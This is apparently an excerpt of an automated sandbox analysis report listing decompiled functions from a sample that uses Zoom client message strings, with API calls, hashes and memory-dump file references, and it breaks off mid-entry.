                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.audio.speaker.destroy.response$deviceGUID
                • API String ID: 4281283084-1561118242
                • Opcode ID: 72fd7e817c16abb4b95726115679cfabde61b121000da52709070069e622cb90
                • Instruction ID: 0b1d0b7e7f7cb0c0b9c75ad96636a52b6568cb88949aa5ddd302daf13eb74035
                • Opcode Fuzzy Hash: 72fd7e817c16abb4b95726115679cfabde61b121000da52709070069e622cb90
                • Instruction Fuzzy Hash: 38E0D870A00385E7D720BB508C96B2F26A4A741B15F904969B2046B382CFF54800D778
                Function 00C6E550 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E557
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.call.device.succeed.notify,00009D1E,Context,00000004), ref: 00C6E572
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Context$com.zoom.app.assistant.control.system.call.device.succeed.notify
                • API String ID: 3166440930-1563161936
                • Opcode ID: 8ccd75696bb70950307d5d491a23f508b3542e7895660d54b22a72513f3afb31
                • Instruction ID: 6a0e832500a1733fecfa310b64c64018c5797bf968b3daf066084a7c77721bc2
                • Opcode Fuzzy Hash: 8ccd75696bb70950307d5d491a23f508b3542e7895660d54b22a72513f3afb31
                • Instruction Fuzzy Hash: EFE0D8B4A007C167C7206B554C85B5E77A8B764717F40092DB6025F3D2CBF44844C7B4
                Function 00C72500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72507
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.removeuser.request,00009E7B,UserID,00000004), ref: 00C72522
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UserID$com.zoom.app.cci.ccivideo.removeuser.request
                • API String ID: 3166440930-2587538509
                • Opcode ID: 0c122066cdffb912bc6a828a6c7acdb5895a51c9788403265ebcf9b5d48b1399
                • Instruction ID: 48168506dc8d02c95057e996d45036178d0e042ee424cdb50e8dfafd38b0454c
                • Opcode Fuzzy Hash: 0c122066cdffb912bc6a828a6c7acdb5895a51c9788403265ebcf9b5d48b1399
                • Instruction Fuzzy Hash: E8E0DFB0A10394A7C760AB649C49B1EB2B4AF54B16F404528B2015B3E2CBF88984D77A
                Function 00C726E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C726E7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onuserleave.notify,00009E79,UsersJson,00000004), ref: 00C72702
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UsersJson$com.zoom.app.cci.ccivideo.onuserleave.notify
                • API String ID: 3166440930-571527980
                • Opcode ID: ed0ddef71ba3a0699cb1a6e9fd21677fe0b195e4cf4b8e83b847358a65393929
                • Instruction ID: 76bfce0f59d1a20e5f5248c0fe62b26035b3772f58d71f1f71cc230ef89b418a
                • Opcode Fuzzy Hash: ed0ddef71ba3a0699cb1a6e9fd21677fe0b195e4cf4b8e83b847358a65393929
                • Instruction Fuzzy Hash: 3CE0DFB0A00380A7D320AB51DC45B1EB6B4AF50B16F404928B2425B3D2CBF44884C7B8
                Function 00C72680 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72687
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onuserjoin.notify,00009E78,UsersJson,00000004), ref: 00C726A2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UsersJson$com.zoom.app.cci.ccivideo.onuserjoin.notify
                • API String ID: 3166440930-469550141
                • Opcode ID: d99ba9f6494ca53669422acbfaf3c96180cbc062bf2be98d9649d592c5266a6a
                • Instruction ID: 82458d086438280824fd42e550f6e415671296b1b627a519e4b1716f20c81d29
                • Opcode Fuzzy Hash: d99ba9f6494ca53669422acbfaf3c96180cbc062bf2be98d9649d592c5266a6a
                • Instruction Fuzzy Hash: 66E0D8B4A003C067D3207B508C8AB1E76B4ABD0B16F504529B2015B3D2CBF44884C779
                Function 00C766B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C766B7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.ps.request_to_term,00013885,reason,00000004), ref: 00C766D2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.ps.request_to_term$reason
                • API String ID: 4281283084-660252024
                • Opcode ID: a999c344f16e847ac566d5a58e922d6b4bf63339836b325b9af6c9182f0059dd
                • Instruction ID: 5222b47bac14020762dda6a1f7da36666546099dd96bd7b27e9d5e31c98f41d6
                • Opcode Fuzzy Hash: a999c344f16e847ac566d5a58e922d6b4bf63339836b325b9af6c9182f0059dd
                • Instruction Fuzzy Hash: 42E0DFB0A00380A7D721BF14CC49B6E26A4AB81B19F84446CB3085B392CFF84941E775
                Function 00C74660 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74667
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.chat.with.buddy,0000277E,UserID,00000004), ref: 00C74682
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UserID$com.Zoom.app.conf.chat.with.buddy
                • API String ID: 3166440930-3420098469
                • Opcode ID: 95c02e4da6427695e66c9bb1e89262b74084559d654d2a13aa6fb36d484cd9e4
                • Instruction ID: 81c65a131e0699de5f9bba3457b6bc4fcfd85bc067dd30573ec3d8ed5bd67369
                • Opcode Fuzzy Hash: 95c02e4da6427695e66c9bb1e89262b74084559d654d2a13aa6fb36d484cd9e4
                • Instruction Fuzzy Hash: BBE0D8B0A0038067D7106B549C49B1E66B4AB5071AF504D6CB2159B3D2CBF44984C7B4
                Function 00C6E670 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E677
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.notify.open.dialpad,0000274C,Param,00000004), ref: 00C6E692
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Param$com.Zoom.app.pt.notify.open.dialpad
                • API String ID: 4281283084-1970144128
                • Opcode ID: 89f5b4911b6f0fb1cd096fd58b84f340010cec2c75aa23be0f12f93652243c3c
                • Instruction ID: fa1c62f1d00799d5a565458e8ccfafdda40ff8d63ac7d2b86399a7ccd7d958e5
                • Opcode Fuzzy Hash: 89f5b4911b6f0fb1cd096fd58b84f340010cec2c75aa23be0f12f93652243c3c
                • Instruction Fuzzy Hash: E0E0D8B1604B4097C3207B159C49B5F2AA49B50719FA0452DF1055F3D3CBF44940DF74
                Function 00C74600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74607
